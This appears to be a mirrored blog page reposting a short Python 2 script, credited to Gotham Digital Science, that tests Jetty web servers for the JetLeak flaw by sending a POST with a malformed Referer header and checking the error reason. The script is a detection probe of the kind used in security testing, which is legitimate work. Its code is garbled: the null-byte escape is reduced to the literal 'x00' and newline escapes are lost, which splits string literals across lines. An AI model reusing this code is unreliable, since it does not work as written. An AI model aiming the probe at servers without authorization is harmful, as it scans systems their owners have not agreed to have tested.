zoukankan      html  css  js  c++  java
  • Jetty-attack-test

    import httplib, urllib, ssl, string, sys, getopt
    from urlparse import urlparse
    
    '''
    Author: Gotham Digital Science
    Purpose: This tool is intended to provide a quick-and-dirty way for organizations to test whether 
             their Jetty web server versions are vulnerable to JetLeak. Currently, this script does 
             not handle sites with invalid SSL certs. This will be fixed in a future iteration.
    '''
    
    if len(sys.argv) < 3:
        print("Usage: jetleak.py [url] [port]")
        sys.exit(1)
    
    url = urlparse(sys.argv[1])
    if url.scheme == '' and url.netloc == '':
        print("Error: Invalid URL Entered.")
        sys.exit(1)
    
    port = sys.argv[2]
    
    conn = None
    
    if url.scheme == "https":
        conn = httplib.HTTPSConnection(url.netloc + ":" + port)
    elif url.scheme == "http":
        conn = httplib.HTTPConnection(url.netloc + ":" + port)
    else: 
        print("Error: Only 'http' or 'https' URL Schemes Supported")
        sys.exit(1)
        
    x = "x00"
    headers = {"Referer": x}
    conn.request("POST", "/", "", headers)
    r1 = conn.getresponse()
    
    if (r1.status == 400 and ("Illegal character 0x0 in state" in r1.reason)):
        print("
    This version of Jetty is VULNERABLE to JetLeak!")
    else:
        print("
    This version of Jetty is NOT vulnerable to JetLeak.")
  • 相关阅读:
    0719PHP基础:PDO
    0717PHP基础:面向对象
    0716PHP基础:面向对象
    0715JS基础:ajax
    0715PHP练习:文件操作
    0715PHP基础:文件操作
    0629正则表达式:基础
    0628正则表达式:练习
    zTree简单使用和代码结构
    servlet
  • 原文地址:https://www.cnblogs.com/crac/p/6697044.html
Copyright © 2011-2022 走看看